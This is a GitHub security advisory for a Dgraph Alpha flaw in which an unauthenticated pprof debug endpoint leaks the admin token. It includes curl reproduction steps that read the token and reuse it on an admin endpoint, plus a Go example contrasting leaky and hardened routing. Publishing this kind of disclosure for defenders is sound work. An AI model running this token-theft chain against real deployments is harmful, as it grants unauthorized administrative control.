
Dgraph: Unauthenticated /debug/pprof/cmdline discloses admin auth token, enabling unauthorized access to protected Alpha admin endpoints

Critical severity GitHub Reviewed Published Apr 15, 2026 in dgraph-io/dgraph • Updated Apr 16, 2026

Package                                      Affected versions   Patched versions
gomod github.com/dgraph-io/dgraph (Go)       <= 1.2.8            None
gomod github.com/dgraph-io/dgraph/v24 (Go)   <= 24.1.7           None
gomod github.com/dgraph-io/dgraph/v25 (Go)   < 25.3.2            25.3.2

Description

Summary

An unauthenticated debug endpoint in Dgraph Alpha exposes the full process command line, including the configured admin token from --security "token=...".

This does not break token validation logic directly; instead, it discloses the credential and enables unauthorized admin-level access by reusing the leaked token in X-Dgraph-AuthToken.

Details

The behavior occurs entirely within core Alpha HTTP routing and does not require any external proxy, plugin, or non-core integration.

The core issue is not that admin token protection is absent, but that the protected secret is exposed in cleartext through an unauthenticated core debug endpoint.

Relevant code paths:

  • dgraph/cmd/alpha/run.go:17 imports net/http/pprof, which registers /debug/pprof/* handlers on the default mux.
  • dgraph/cmd/alpha/run.go:533 uses http.Handle("/", audit.AuditRequestHttp(baseMux)), so default-mux handlers remain reachable.
  • dgraph/cmd/alpha/admin.go:52 enforces admin token checks in adminAuthHandler for admin endpoints.
  • dgraph/cmd/alpha/admin.go:74 shows /admin/config/cache_mb behind adminAuthHandler.

Credential-exposure chain:

  1. /debug/pprof/cmdline is reachable without authentication.
  2. Its output includes the configured admin token from process arguments.
  3. The disclosed token is accepted by adminAuthHandler when sent as X-Dgraph-AuthToken.
  4. An attacker gains unauthorized access to admin-only functionality.

Observed local evidence (safe validation):

  • Request: GET /admin/config/cache_mb without token
    • Status: 200 (request rejected at application layer)
    • Body contains error: Invalid X-Dgraph-AuthToken
    • The endpoint returns HTTP 200 but indicates authentication failure in the response body.
  • Request: GET /debug/pprof/cmdline without token
    • Status: 200
    • Body excerpt includes: --security=token=TopSecretToken123;
  • Request: GET /admin/config/cache_mb with X-Dgraph-AuthToken: TopSecretToken123
    • Status: 200
    • Body: 4096

Important policy/triage clarification:

  • This issue persists even when the admin-token security feature is enabled: the token itself is exposed via an unauthenticated core debug endpoint, making this more than a misconfiguration-only concern.
  • Network restrictions (bind/whitelist/firewall) may reduce exposure, but they do not remediate the underlying credential disclosure behavior.

PoC

  • Branch: main
  • Commit: b15c87e93
  • Describe: v25.3.1

Preconditions:

  • Alpha HTTP port is reachable by attacker traffic.
  • Admin token is configured via supported startup flag: --security "token=...".
  • /debug/pprof/* is exposed on the same Alpha HTTP listener.
  • This behavior occurs with documented startup flags and without any non-default or unsupported configuration.

Reproduction steps:

  1. Start Zero and Alpha (example local setup):

    • dgraph zero --my=127.0.0.1:5280 --port_offset=200 --bindall=false --wal=./zw
    • dgraph alpha --my=127.0.0.1:7280 --zero=127.0.0.1:5280 --port_offset=200 --bindall=false --security "token=TopSecretToken123;" --postings=./p --wal=./w --tmp=./t
  2. Verify admin endpoint rejects unauthenticated request:

    • curl -i http://127.0.0.1:8280/admin/config/cache_mb
    • Expected body includes Invalid X-Dgraph-AuthToken.
  3. Read token from unauthenticated debug endpoint:

    • curl -s http://127.0.0.1:8280/debug/pprof/cmdline
    • Expected output includes --security=token=TopSecretToken123;.
  4. Reuse leaked token against admin endpoint:

    • curl -i -H "X-Dgraph-AuthToken: TopSecretToken123" http://127.0.0.1:8280/admin/config/cache_mb
    • Expected: successful response (example observed: 4096).

Note: The PoC uses 127.0.0.1 only for safe local validation. The vulnerable condition is unauthenticated reachability of /debug/pprof/cmdline; in any deployment where Alpha HTTP is reachable by untrusted parties, the same token disclosure and subsequent unauthorized admin access apply.
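The routing mistake described under "Relevant code paths" and exercised by the reproduction steps above, modelled as an added example in Go. This is not Dgraph's code. It builds a mux the way the blank import of net/http/pprof combined with http.Handle("/", ...) does, next to a hardened layout that serves only the application mux on the public listener and keeps pprof on a separate, token-gated handler intended for a loopback-only bind. The requireAdminToken stand-in, the fixed token value, the "/admin/config/cache_mb" response body and the 401 status on a rejected request are assumptions of the example (the advisory notes the real handler returns 200 with an error body).

```go
package main

import (
	"fmt"
	"net/http"
	"net/http/httptest"
	"net/http/pprof"
)

// Constructed token for this example only; in Dgraph it comes from --security "token=...".
const exampleAdminToken = "TopSecretToken123"

// requireAdminToken is a simplified stand-in for the header check adminAuthHandler performs
// (an assumption of this example, not Dgraph's code). It answers 401 on a missing or wrong
// token; the advisory notes the real handler answers 200 with an error body.
func requireAdminToken(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if r.Header.Get("X-Dgraph-AuthToken") != exampleAdminToken {
			http.Error(w, "Invalid X-Dgraph-AuthToken", http.StatusUnauthorized)
			return
		}
		next.ServeHTTP(w, r)
	})
}

// appMux carries the application's own routes; only the admin route matters here.
func appMux() *http.ServeMux {
	app := http.NewServeMux()
	app.Handle("/admin/config/cache_mb", requireAdminToken(http.HandlerFunc(
		func(w http.ResponseWriter, _ *http.Request) { fmt.Fprint(w, "4096") })))
	return app
}

// leakyHandler models the pre-fix layout: `import _ "net/http/pprof"` registers /debug/pprof/*
// on http.DefaultServeMux, and http.Handle("/", app) mounts the application on that same mux.
// A fresh ServeMux stands in for DefaultServeMux so the example leaves process-global state alone.
func leakyHandler() http.Handler {
	defaultMux := http.NewServeMux()
	defaultMux.HandleFunc("/debug/pprof/cmdline", pprof.Cmdline) // what the blank import does
	defaultMux.Handle("/", appMux())                             // "/" is the least specific pattern, so pprof keeps its path
	return defaultMux
}

// hardenedHandler serves only the application mux on the public listener. pprof is not
// registered on it, so /debug/pprof/cmdline is a plain 404 regardless of the blank import.
func hardenedHandler() http.Handler {
	return appMux()
}

// loopbackProfilingHandler is what an operator would bind to 127.0.0.1 only if profiling is
// still wanted; it is additionally gated with the admin check so an accidental wider bind
// still requires the credential instead of handing it out.
func loopbackProfilingHandler() http.Handler {
	prof := http.NewServeMux()
	prof.HandleFunc("/debug/pprof/cmdline", pprof.Cmdline)
	return requireAdminToken(prof)
}

// statusFor sends one in-process request and returns the HTTP status. As a self-check, a
// 200 for an unauthenticated GET /debug/pprof/cmdline means the process arguments, token
// included, are being served to anyone who can reach the port.
func statusFor(h http.Handler, path, token string) int {
	req := httptest.NewRequest(http.MethodGet, path, nil)
	if token != "" {
		req.Header.Set("X-Dgraph-AuthToken", token)
	}
	rec := httptest.NewRecorder()
	h.ServeHTTP(rec, req)
	return rec.Code
}

func main() {
	layouts := []struct {
		name string
		h    http.Handler
	}{{"leaky", leakyHandler()}, {"hardened", hardenedHandler()}, {"loopback", loopbackProfilingHandler()}}
	for _, l := range layouts {
		fmt.Printf("%-8s cmdline/no token=%d  admin/no token=%d  admin/token=%d\n", l.name,
			statusFor(l.h, "/debug/pprof/cmdline", ""),
			statusFor(l.h, "/admin/config/cache_mb", ""),
			statusFor(l.h, "/admin/config/cache_mb", exampleAdminToken))
	}
}
```

Running it prints the status each layout returns for the three requests the advisory uses as evidence; the leaky layout answers 200 for an unauthenticated cmdline request, the hardened one 404. The general point, independent of Dgraph: a blank import of net/http/pprof anywhere in a binary registers on http.DefaultServeMux unconditionally, so the handler passed to the public listener must never be the default mux (and http.Handle or http.HandleFunc must not be used for the public routes), or the profiling routes must be wrapped in the same authentication as the admin routes.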

Impact

  • Unauthenticated disclosure of a sensitive admin credential via a debug endpoint, enabling unauthorized privileged administrative access through token reuse.
  • Affected deployments: operators running Dgraph Alpha with an admin token configured, where the Alpha HTTP/debug routes are reachable by untrusted users or networks.

The attack requires network reachability to the Alpha HTTP port. In deployments where this interface is exposed beyond trusted boundaries, the issue is remotely exploitable without authentication.

Depending on exposed admin functionality in deployment policy, this may allow configuration changes, operational control actions, and other privileged administrative operations exposed through /admin/*.

References

@matthewmcneely published to dgraph-io/dgraph Apr 15, 2026
Published by the National Vulnerability Database Apr 15, 2026
Published to the GitHub Advisory Database Apr 16, 2026
Reviewed Apr 16, 2026
Last updated Apr 16, 2026

Severity

Critical


CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
Low

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L

EPSS score

Exploit Prediction Scoring System (EPSS)

This score estimates the probability of this vulnerability being exploited within the next 30 days. Data provided by FIRST.
(32nd percentile)

Weaknesses

Exposure of Sensitive Information to an Unauthorized Actor

The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information.

Insertion of Sensitive Information Into Debugging Code

The product inserts sensitive information into debugging code, which could expose this information if the debugging code is not disabled in production.

CVE ID

CVE-2026-40173

GHSA ID

GHSA-95mq-xwj4-r47p
